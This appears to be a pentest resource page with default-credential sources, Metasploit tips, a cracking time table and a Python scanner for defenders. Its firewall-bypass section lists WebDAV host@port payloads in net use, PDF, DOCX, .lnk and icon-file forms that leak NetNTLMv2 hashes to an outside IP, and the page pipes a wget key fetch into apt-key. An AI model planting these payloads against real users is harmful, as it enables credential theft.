
The Cloud Source for Client Engagement Resources
General Pentest Resources:
Default Application Credential Lists:
- Lifewire.com (Cisco)
- A1Security.com (IP Cameras)
- NetbiosX.Github (VoIP Systems)

Resolving Common Metasploit Issues / Modification:

apt-get update Error - Expired Repository Key (ED444FF07D8D0BF6)
This occurs when the GPG key expires, typically in infrequently updated VMs. To fix, as root:
1. Open a terminal window
2. Paste in this command:
wget -q -O - https://archive.kali.org/archive-key.asc | apt-key add -
3. Press Enter
4. Rerun apt-get update

Adding a Module to Metasploit:
1. Find the appropriate module store:
a. Non-Kali install: cd /root/.msf4
   Kali install: cd /usr/share/metasploit-framework/
b. cd modules
c. Select the top-level Action Folder (e.g. exploits, etc...)
d. Select the appropriate mid-tier category folder (e.g. Remote)
e. Select the component category (e.g. httpclient)
f. Copy the new .rb file to the path
g. Start / restart Metasploit
h. Call the new module using the path/module name

Generalized Password Cracking Time Table (Calculated in Days)

# Characters | No Complexity | Std Complexity | Std Dictionary Attack w/ Mangling
6            | < 1           | < 1            | < 1
8            | < 1           | < 1            | < 1
10           | < 1           | 71             | 2
12           | 577           | 612,191        | 5
14           | 1,559,108     | 5,294,837,932  | 11

Firewall Bypass Methods to pass NetNTLMv2 responses externally:
Method: {ip}@{bypass-port}\{file-2-request.ext}
Examples:

Net Use: net use \\1.2.3.4@80\t
PDF: /F (\\\\IP@80\\t)
Subdoc: ///IP@80/t
MS DocX: Target="file://IP@80/t.dotx"
LinkFile: URL=file://IP@80/t.htm
IconFile: IconFile=\\IP@80\t.ico
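
For the defending side, the host@port forms listed above can be searched for in documents, shortcut files and command logs. The scanner below is an added example, not part of the original page; the regexes, the INTERNAL ranges and the sample lines are assumptions made for illustration.

```python
import ipaddress
import re

# Assumption: these ranges stand in for "internal"; replace with your own networks.
INTERNAL = [ipaddress.ip_network(n) for n in
            ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8")]

HOST_PORT = r"(?P<host>[A-Za-z0-9][A-Za-z0-9.-]*)@(?P<port>\d{1,5})"
PATTERNS = [
    # \\host@port\path, including the doubled backslashes used inside PDF strings
    ("unc", re.compile(r"\\{2,4}" + HOST_PORT + r"\\")),
    # file://host@port/path and the scheme-less ///host@port/path form
    ("url", re.compile(r"(?:file:|(?<![:\w/]))/{2,3}" + HOST_PORT + r"/")),
]


def is_external(host):
    """True when host is outside INTERNAL; dotted hostnames count as external."""
    try:
        addr = ipaddress.ip_address(host)
    except ValueError:
        return "." in host
    return not any(addr in net for net in INTERNAL)


def find_webdav_refs(text):
    """Return (kind, host, port, external) for every host@port file reference."""
    hits = []
    for kind, rx in PATTERNS:
        for m in rx.finditer(text):
            port = int(m["port"])
            if 0 < port < 65536:
                hits.append((kind, m["host"], port, is_external(m["host"])))
    return hits


# Constructed sample lines; 203.0.113.10 is a documentation address.
SAMPLES = [
    r"net use \\203.0.113.10@80\t",
    r"/F (\\\\203.0.113.10@80\\t)",
    r'Target="file://203.0.113.10@80/t.dotx"',
    r"IconFile=\\203.0.113.10@80\t.ico",
    r"net use \\192.168.1.20\share",      # plain SMB path, no @port: not reported
    "https://intranet@8443/login",         # userinfo in an http URL: not reported
]

if __name__ == "__main__":
    for line in SAMPLES:
        for kind, host, port, external in find_webdav_refs(line):
            print(f"{'EXTERNAL' if external else 'internal'} {kind} {host}:{port} <- {line}")
```

Hits marked EXTERNAL are the ones worth correlating with outbound HTTP carrying NTLM authentication at the proxy or firewall.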
Pentest-Zen (ExitC0de00c.com)
